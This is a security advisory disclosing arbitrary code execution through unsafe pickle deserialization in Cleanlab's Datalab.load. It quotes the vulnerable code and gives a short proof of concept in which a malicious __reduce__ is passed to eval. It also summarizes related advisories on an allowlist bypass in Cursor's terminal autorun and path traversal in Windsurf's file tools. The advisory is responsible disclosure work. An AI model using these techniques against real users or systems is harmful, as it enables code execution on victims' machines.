SAI Security Advisory

Unsafe deserialization in Datalab leads to arbitrary code execution

September 12, 2024

Products Impacted

This vulnerability exists in versions  v2.4.0 or newer of Cleanlab.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data

Details

To exploit this vulnerability, an attacker would create a directory and place a malicious file called datalabs.pkl in that directory before sending the directory to a victim user. When the victim user loads the directory with Datalabs.load, the vulnerable code is called. The vulnerability exists in the deserialize function of the _Serializer class in the cleanlab/datalab/internal/serialize.py file (shown below).

   @classmethod
    def deserialize(cls, path: str, data: Optional[Dataset] = None) -> Datalab:
        """Deserializes the datalab object from disk."""

        if not os.path.exists(path):
            raise ValueError(f"No folder found at specified path: {path}")

        with open(os.path.join(path, OBJECT_FILENAME), "rb") as f:
            datalab: Datalab = pickle.load(f)

        cls._validate_version(datalab)

        # Load the issues from disk.
        issues_path = os.path.join(path, ISSUES_FILENAME)
        if not hasattr(datalab.data_issues, "issues") and os.path.exists(issues_path):
            datalab.data_issues.issues = pd.read_csv(issues_path)

        issue_summary_path = os.path.join(path, ISSUE_SUMMARY_FILENAME)
        if not hasattr(datalab.data_issues, "issue_summary") and os.path.exists(issue_summary_path):
            datalab.data_issues.issue_summary = pd.read_csv(issue_summary_path)

        if data is not None:
            if hash(data) != hash(datalab._data):
                raise ValueError(
                    "Data has been modified since Lab was saved. "
                    "Cannot load Lab with modified data."
                )

            if len(data) != len(datalab.labels):
                raise ValueError(
                    f"Length of data ({len(data)}) does not match length of labels ({len(datalab.labels)})"
                )

            datalab._data = Data(data, datalab.task, datalab.label_name)
            datalab.data = datalab._data._data

        return datalab

The above code is called by the Datalab.load function shown below.

@staticmethod
    def load(path: str, data: Optional[Dataset] = None) -> "Datalab":
        """Loads Datalab object from a previously saved folder.

        Parameters
        ----------
        `path` :
            Path to the folder previously specified in ``Datalab.save()``.

        `data` :
            The dataset used to originally construct the Datalab.
            Remember the dataset is not saved as part of the Datalab,
            you must save/load the data separately.

        Returns
        -------
        `datalab` :
            A Datalab object that is identical to the one originally saved.
        """
        datalab = _Serializer.deserialize(path=path, data=data)
        load_message = f"Datalab loaded from folder: {path}"
        print(load_message)
        return datalab

When the user loads the directory with the maliciously crafted pickle file the code shown above will instantiate the _Serializer class and call the deserialize function which then searches for the datalab.pkl file before running pickle.load on the file. An example attack can be seen below, where first we create our exploit directory with the malicious pickle file.

import pickle

class Exploit:
    def __reduce__(self):
        return (eval, ("print('pwned')",))
    
open("./exploit/datalab.pkl", "wb").write(pickle.dumps(Exploit()))

Once the file has been created, the vulnerability can be exploited by having the user load the malicious directory:

from cleanlab import Datalab

Datalab.load("./exploit")

Once the user runs this, the arbitrary code will be executed on the system.

Timeline

July, 11 2024 — Vendor disclosure via process outlined in security page

September 6, 2024 — Followed up with vendor letting them know we plan to publish on September 12, 2024

September 12, 2024 — Public disclosure

Project URL

https://cleanlab.ai/

https://github.com/cleanlab/cleanlab

Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer

Related SAI Security Advisory

CVE-2025-62354

November 26, 2025

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

Cursor

When in autorun mode, Cursor checks commands sent to run in the terminal to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic allowing an attacker to craft a command that will execute non-allowed commands.

November 2025
CVE-2025-62353

October 17, 2025

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

Windsurf

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

October 2025